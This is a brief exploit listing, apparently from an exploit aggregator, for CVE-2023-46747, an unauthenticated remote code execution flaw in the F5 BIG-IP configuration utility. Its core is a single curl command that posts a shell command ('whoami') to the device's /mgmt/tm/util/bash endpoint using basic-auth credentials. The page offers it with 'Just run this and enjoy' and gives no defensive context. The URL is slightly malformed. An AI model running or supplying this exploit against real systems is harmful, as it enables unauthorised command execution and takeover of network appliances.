Share
## https://sploitus.com/exploit?id=3850D5AB-0701-50A5-86B4-ADF2590DFE19
# CVE-2023-46747-POC
F5 BIG-IP unauthenticated remote code execution (RCE) and authentication bypass vulnerability!

CVE-2023-46747 BIG-IP Configuration utility unauthenticated remote code execution vulnerability

Just run this and enjoy:


curl -sk -u 'ali:ali' -H 'Content-Type: application/json' -X POST \

-d '{"command": "run", "utilCmdArgs": "-c \"whoami\""}'  \

https:///$IP:$PORT/mgmt/tm/util/bash